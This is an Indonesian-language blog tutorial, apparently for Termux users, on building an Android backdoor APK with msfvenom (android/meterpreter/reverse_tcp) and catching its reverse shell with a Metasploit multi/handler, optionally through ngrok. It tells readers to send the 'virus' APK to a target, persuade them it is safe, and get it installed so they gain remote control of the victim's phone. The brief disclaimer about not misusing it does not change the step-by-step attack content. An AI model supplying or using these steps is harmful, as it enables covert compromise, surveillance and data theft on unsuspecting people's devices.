Pertama-tama kita update dan upgrade dulu seperti biasa nya kemudian setelah itu kita jalan kan metasploit nya di halaman ( session 1 ) dengan mengetikan :
$ msfconsole
Lalu buka session baru ( session 2 ) untuk kita membuat payload nya
Ketikan saja :
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=( ip kalian ) LPORT=( terserah kalian ) -o /sdcard/(nama paylod/apk virusnya).apk
Contoh jadi seperti ini :
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /sdcard/backdoor.apk
Untuk mencari lhost bisa cari di ( session 3 ) kemudian ketikan ifconfig lalu cari ip kalian klau ingin lebih aman lagi kita bisa buka ngrok lalu kita copy ngrok kita kemudian ketikan seperti ini
$ ifconfig ( pastekan ngrok kita )
Lalu kita copy ip dari hasil ifconfig ngrok itu
Kita tunggu hasil dari pembuatan paylod/virus yang kita buat tadi kita lihat apakan metasploit nya sudah masuk kita set dulu msfconsole nya okeh
Kita balik ke session 1
Cara set lhost & lport nya hanya contoh :
Msf5 > use exploit/multi/handler
Msf5 ..................... > Set payload android/meterpreter/reverse_tcp
Msf5 ...................... > Set lhost 127.0.0.1
Msf5 ...................... > Set lport 4444
Jika sudah jangan di run/exploit dulu kita lihat apakah apk payload yg kita sudah jadi jika sudah jadi kita buka file manager hp kita terus kita cari apk payload nya
kemudian kita kirim payload/virus tersebut ke target kita ya tentu nya bisa dengan banyak cara agar target kita percaya bahwa apk yg kita kirim aman dan pastikan si target menginstall dan membuka payload nya baru kita run/exploit
( session1 )
Msf5 ...................... > run
Jika sudah muncul tulisan meterpreter berarti kita sudah terhubung dengan hp si target dan bisa mengeksploit atau meremote hp si target...
Kalau sudah terhubung maka tulisan nya akan jadi seperti ini 👇
Meterpreter >
Catatan :
- Gunakan sebaik-baiknya dan jangan di salah gunakan
- metasploit juga bisa di gunakan untuk meremote komputer, laptop,dll
- bisa digunakan sebagai penetrasion testing
Done.
0 komentar: